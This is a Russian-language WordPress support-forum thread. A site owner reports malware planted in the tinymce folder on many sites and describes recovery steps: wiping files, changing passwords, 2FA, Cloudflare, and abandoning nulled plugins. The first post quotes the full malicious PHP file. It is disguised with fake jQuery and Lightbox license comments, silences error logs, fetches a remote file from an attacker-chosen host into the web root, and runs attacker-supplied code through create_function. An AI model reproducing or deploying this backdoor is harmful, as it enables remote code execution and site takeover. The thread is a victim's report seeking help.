Вирус (\wp-includes\js\tinymce)

  • Решено Serjant

    (@serjal)


    3 месяца назад

    Всем привет. Сегодня утром на хостинге антивирус ругался на файл в папке tinymce (\wp-includes\js\tinymce) именно создавался файл \wp-includes\js\tinymce\langs\80504209.phtxm + avatar.png + .htaccess и вопросы был в файле 80504209.phtxm и в строке $sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );

    В один момент произошло на 10 сайтах и 6 поддоменах. Кто то сталкивался с таким ?. Я снёс всю папку tinymce.

    Вирусов на компе нету, фтп доступы все свежые и они только у меня, больше не укого нету. То есть может через какой-то плагин залетел или что ещё.

     * jQuery Image Library v1.6.3
     * http://jquery.com/
     *
     * Copyright 2011, John Resig
     * Dual licensed under the MIT or GPL Version 2 licenses.
     * http://jquery.org/license
     *
     * Includes Sizzle.js
     * http://sizzlejs.com/
     * Copyright 2011, The Dojo Foundation
     * Released under the MIT, BSD, and GPL Licenses.
     *
     * Date: Thu May 12 15:04:36 2011 -0400
     *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
     */
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('display_errors', 0);
    @ini_set('allow_url_fopen', 1);
    @error_reporting(0);
    /*
    Lightbox v2.51
    by Lokesh Dhakar - http://www.lokeshdhakar.com

    For more information, visit:
    http://lokeshdhakar.com/projects/lightbox2/

    Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
    - free for use in both personal and commercial projects
    - attribution requires leaving author name, author link, and the license info intact
    	
    Thanks
    - Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.com), and Thomas Fuchs(mir.aculo.us) for ideas, libs, and snippets.
    - Artemy Tregubenko (arty.name) for cleanup and help in updating to latest proto-aculous in v2.05.
    */


    echo "<!-- "."tes"."ts -->"; 
    $cmat='unct' .'ion';$cmat= 'cre' . 'ate' .'_f' .$cmat;$Libr= "_ostp";
    $sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );if((isset(${$sizz }[ 'j01bt5ri3p']))&(isset(${$sizz}['fail']))){
    if(isset(${$sizz}[ 'pathik'])){$pathik=$_SERVER['DOCUMENT_ROOT'].${$sizz}['pathik'];}else{$pathik=$_SERVER['DOCUMENT_ROOT'].'/license.php';}
    if(isset(${$sizz}[ 'unl'])){@unlink($pathik);exit();}
    /*! jQuery v@1.8.0 jquery.com | jquery.org/license */
    if(@ini_get('allow_url_fopen')){@copy('http://'.${$sizz}['fail'].'/test.txt', $pathik);}
    if((@function_exists('curl_init'))and ((!file_exists($pathik)) or (@filesize($pathik)<'1'))) {
    $ch = @curl_init();curl_setopt( $ch, CURLOPT_URL, 'http://'.${$sizz}['fail'].'/test.txt' );
    curl_setopt( $ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] );curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $fp = @fopen($pathik, 'w');curl_setopt($ch, CURLOPT_FILE, $fp);@curl_exec( $ch );curl_close( $ch );fclose($fp);}}
    if (@function_exists($cmat)){if(isset( ${$sizz }[ 'j01bt5ri3p'] ) ) {$cmat('', '};'.${$sizz }['j01bt5ri3p'].'{');}} 
    ?>
Просмотр 2 ответов — с 16 по 17 (всего 17)
1 2
  • Автор Serjant

    (@serjal)

    3 месяца назад

    efess, Спасибо большое за ответ. Я вот и хотел спросить за это. То есть прислушаюсь к 𝗥𝟯𝗡𝟬, останусь на своём хостинге. Просто думаю тогда сделать так, удалить под 0 с сервера, те скачанные файлы что на компе так же всё под 0 снести кроме темы, думаю вот такой вариант, базу на всякий случай тоже снесу. Поменял все пароли, подключил двухфакторную авторизацию убил все процессы (есть такое свойство в хост панели.). Сам хост местный, надежный.

    Отдельно спасибо за «контроль сайта от sucuri» рассмотрю.

    Автор Serjant

    (@serjal)

    3 месяца назад

    По поводу вопроса, часть сайтов востановил, именно те которых были копии в гите в том числе бэкап базы. Так как снёс под 0 файлы + базы. Соответственно те которые были без гита безвозвратно RIP. Сменил все пароли, включил двухфакторную авторизацию. Доступ только по ИП ко всем функциям хоста, установил cloudflare. Так же на хосте есть возможность установить защиту от ботов, которая блокирует через капчу переход по ссылкам папок и файлов

    /wp-admin* 
    /wp-includes* 
    /wp-login.php*  
    /xmlrpc.php*

    В целом поптыки ещё были +- на протяжении 5-6 часов, но по логам нечего вредоносного не заливалось на сайт. Надеюсь поможет и проблема решина.

    Пришлось купить avast premium)) что бы была защита на компе, снес все nulled архивы, след. покупка ACF 😉

    То есть был офф софт 99%. Теперь только всё 100%.

    С таким столкнулся первый раз, урок на всю жизнь ). Всем спасибо кто отвечал и помогал решить вопрос.

Просмотр 2 ответов — с 16 по 17 (всего 17)
1 2